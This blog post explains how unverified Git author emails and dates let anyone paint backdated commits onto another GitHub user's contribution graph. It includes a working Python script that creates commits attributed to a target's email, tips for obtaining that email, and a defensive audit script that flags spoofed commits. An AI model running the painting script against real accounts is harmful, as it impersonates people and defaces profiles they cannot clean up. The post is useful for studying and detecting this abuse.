GitHub Graffiti
For years, open source projects have let you "decorate" your contribution graph with fake, backdated Git commit histories.
But did you know you can graffiti OTHER PEOPLE'S GitHub activity? Take for example the banner below, which I stuck on a few spammers' and phishers' GitHub profiles.
Here's how.
You may know that you can paint pixel art on your GitHub activity graph with a simple script, taking advantage of the fact that Git commits can be backdated and that GitHub performs no timestamp validation on the commits it receives:
There is, however, a rather strange validation step between the author email on a Git commit and the emails attached to a GitHub account.
You may think there's no validation at all, but take a look at the documentation below to see how attribution is done:
This means that in order to plaster over someone else's contribution graph, we need to meet the following conditions:
They must have opened an issue (or pushed code) on a repository you can push to (or get a PR merged into)
You must know an email address associated with their GitHub account
The repository must not be a fork
It’s ripe for abuse.
This lets anyone plaster a 7x52-pixel billboard onto another user's profile without their permission. To make matters worse, as the victim you can't remove those commits, since they live in a repository you don't control. That's not great...
How to use this power for good.
There have been recent phishing attempts leveraging GitHub issues to email victims.
Additionally, there have been many cases of GitHub users merging malicious code into repos they don't own, such as the infamous XZ backdoor:
Wouldn't it be great if we could put some kind of warning on these users' profiles to alert others? You can probably see where this is going.
Once the fraudster/scammer/hacker in question opens an issue or submits a PR to a repository we control, we meet one of the conditions above and can paint their activity graph to warn others.
Indeed, it did not take long before I had a fraudster opening a GitHub issue on a repo I had push access to, allowing me to set the trap (the user has since been banned from GitHub).
If you'd like to try this for yourself, take one of the existing contribution graph graffiti projects (such as this one) and modify it to use the email of your scammer. These emails are often obtainable from the spammer's public events API feed, or by simply cloning their repos and viewing the author emails on their old commits.
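A minimal version of such a script, written here as an added example and not taken from the post or any linked graffiti project. It assumes REPO is a local clone of a non-fork repository whose default branch you can push to, TARGET_NAME and TARGET_EMAIL are placeholders for the identity GitHub associates with the target account, and PATTERN is a constructed sample (7 rows for Sunday through Saturday, one column per week). The commits only count toward the graph once they are pushed to the default branch.

```python
"""Paint a pattern onto a contribution graph with backdated, re-attributed commits.

Added example (not the post's or any linked project's script). Assumptions:
  * REPO is a local clone of a non-fork repository you can push to;
  * TARGET_NAME / TARGET_EMAIL are placeholders for an email associated with
    the target GitHub account (their old commits or events feed usually reveal it);
  * PATTERN is a constructed sample: 7 rows (Sun..Sat) x N week columns, '#' = commit.
"""
import datetime as dt
import os
import subprocess

REPO = "./graffiti-repo"
TARGET_NAME = "Target Name"
TARGET_EMAIL = "target@example.com"

PATTERN = [
    "#...#.###",
    "#...#..#.",
    "#...#..#.",
    "#####..#.",
    "#...#..#.",
    "#...#..#.",
    "#...#.###",
]


def graph_start(today: dt.date) -> dt.date:
    """Sunday that opens the leftmost column of a 52-column graph ending this week.

    GitHub's columns are Sunday-to-Saturday weeks; the rightmost column is the
    current week, so the graph starts 51 weeks before this week's Sunday."""
    this_sunday = today - dt.timedelta(days=(today.weekday() + 1) % 7)
    return this_sunday - dt.timedelta(weeks=51)


def commit_dates(pattern, start: dt.date, commits_per_cell: int = 1) -> list[dt.date]:
    """Map each '#' cell to a calendar day: column = week offset, row = weekday offset.

    More commits on one day render as a darker cell, so commits_per_cell sets the shade."""
    if len(pattern) != 7:
        raise ValueError("pattern needs exactly 7 rows (Sunday..Saturday)")
    width = len(pattern[0])
    if any(len(row) != width for row in pattern):
        raise ValueError("all pattern rows must have the same width")
    dates = []
    for week in range(width):
        for day, row in enumerate(pattern):
            if row[week] == "#":
                dates.extend([start + dt.timedelta(weeks=week, days=day)] * commits_per_cell)
    return dates


def paint(repo: str, name: str, email: str, dates) -> int:
    """Create one empty commit per date, attributed to `email` and dated in the past.

    Git takes author/committer identity and dates straight from the environment with
    no verification; GitHub later attributes each commit to whichever account has
    `email` attached. Returns the number of commits created."""
    count = 0
    for day in sorted(dates):
        stamp = f"{day.isoformat()}T12:00:00"
        env = {
            **os.environ,
            "GIT_AUTHOR_NAME": name, "GIT_AUTHOR_EMAIL": email,
            "GIT_COMMITTER_NAME": name, "GIT_COMMITTER_EMAIL": email,
            "GIT_AUTHOR_DATE": stamp, "GIT_COMMITTER_DATE": stamp,
        }
        subprocess.run(
            ["git", "-C", repo, "commit", "--allow-empty", "-q", "-m", f"graffiti {day}"],
            env=env, check=True,
        )
        count += 1
    return count


if __name__ == "__main__":
    dates = commit_dates(PATTERN, graph_start(dt.date.today()))
    made = paint(REPO, TARGET_NAME, TARGET_EMAIL, dates)
    print(f"created {made} commits; push the default branch to render them")
```

A pattern narrower than 52 columns leaves the remaining weeks untouched, so the banner sits at the left edge of the graph and the target's own activity stays visible to its right.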
What have we learned here?
It's easy to imagine someone abusing this for less noble purposes: you could drop curse words, or worse, onto innocent GitHub users' profiles. The problem could be fixed if the graph were based on push events instead of raw commit dates; however, that may upset users who push many days' worth of commits in one go.
In any case, this sits right on the edge between a weak authentication mechanism inside Git itself (author email and date are unverified, free-form fields) and GitHub stapling an RBAC system around it.
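The push-event idea above can also be used defensively today by anyone reviewing a repository's history. The following audit is an added example, not code from the post: it parses constructed `git log` output and flags a commit when its author email is not the pusher's, or when its author date sits far before the time the push carrying it arrived (which on GitHub is the PushEvent's `created_at` in the events API). The log lines, push time, and pusher address are constructed samples.

```python
"""Audit pushed commits for contribution-graph spoofing.

Added example, not code from the post. Two checks: a commit attributed to an email
other than the pusher's, and a commit whose author date is far earlier than the
push that delivered it. SAMPLE_* values below are constructed."""
import datetime as dt
from dataclasses import dataclass

# Constructed output of:  git log --format='%H%x09%ae%x09%ce%x09%aI'
SAMPLE_LOG = """\
a1b2c3\tmaintainer@example.com\tmaintainer@example.com\t2024-06-10T09:15:00+00:00
d4e5f6\tvictim@example.com\tvictim@example.com\t2023-09-03T12:00:00+00:00
"""
# Constructed: when the push carrying both commits reached the server.
SAMPLE_PUSHED_AT = dt.datetime(2024, 6, 11, 8, 0, tzinfo=dt.timezone.utc)
SAMPLE_PUSHER = "maintainer@example.com"


@dataclass(frozen=True)
class Commit:
    sha: str
    author_email: str
    committer_email: str
    author_date: dt.datetime  # the date the contribution graph paints


def parse_log(log_text: str) -> list[Commit]:
    """Parse tab-separated git log lines; %aI is strict ISO 8601 with a UTC offset."""
    commits = []
    for line in log_text.strip().splitlines():
        sha, author, committer, author_date = line.split("\t")
        commits.append(Commit(sha, author, committer, dt.datetime.fromisoformat(author_date)))
    return commits


def flag_reasons(c: Commit, pusher_email: str, pushed_at: dt.datetime,
                 max_backdate: dt.timedelta = dt.timedelta(days=2)) -> list[str]:
    """Return why a commit looks like graffiti; an empty list means it looks normal.

    Both checks have benign explanations (merging someone else's PR, pushing a week
    of offline work), so the result is a triage queue rather than a verdict."""
    reasons = []
    if c.author_email.lower() != pusher_email.lower():
        reasons.append(f"author {c.author_email} is not the pusher {pusher_email}")
    lag = pushed_at - c.author_date
    if lag > max_backdate:
        reasons.append(f"backdated by {lag.days} days")
    return reasons


def audit(log_text: str, pusher_email: str, pushed_at: dt.datetime) -> dict[str, list[str]]:
    """Map sha -> reasons for every commit in the log that trips at least one check."""
    findings = {}
    for c in parse_log(log_text):
        reasons = flag_reasons(c, pusher_email, pushed_at)
        if reasons:
            findings[c.sha] = reasons
    return findings


if __name__ == "__main__":
    for sha, reasons in audit(SAMPLE_LOG, SAMPLE_PUSHER, SAMPLE_PUSHED_AT).items():
        print(sha, "; ".join(reasons))
```

Raising `max_backdate` to a week or more is the knob for the trade-off the post mentions: a looser window stops flagging people who push a few days of work at once, at the cost of letting a graffiti artist paint that many days without tripping the check.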